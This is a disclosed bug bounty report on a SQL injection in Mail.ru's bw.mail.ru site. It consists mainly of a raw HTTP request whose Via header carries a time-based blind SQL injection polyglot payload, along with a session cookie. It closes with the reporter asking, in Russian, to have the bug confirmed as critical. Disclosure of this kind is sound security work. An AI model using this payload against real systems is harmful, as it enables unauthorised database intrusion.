ReportLink:https://hackerone.com/reports/10468
WeaknessName:SQL Injection
Reporter:https://hackerone.com/vah13
ReportedTo:Mail.ru(mailru)
BountyAmount:150.0
Severity:
State:Closed
DateOfDisclosure:12.09.2014 13:12:19

Summary:

GET /guide/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Via: if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 1=1)"*/
X-Requested-With: XMLHttpRequest
Referer: http://bw.mail.ru/
Cookie: PHPSESSID=28e695b13ecd7d774cd487f6190ce391; bloodworld_2005102202=28e695b13ecd7d774cd487f6190ce391; bwIP=80.70.234.113; stat_reference_id=9926724
Host: bw.mail.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

ок, тогда пожалуйста подтвердите что данная бага критична )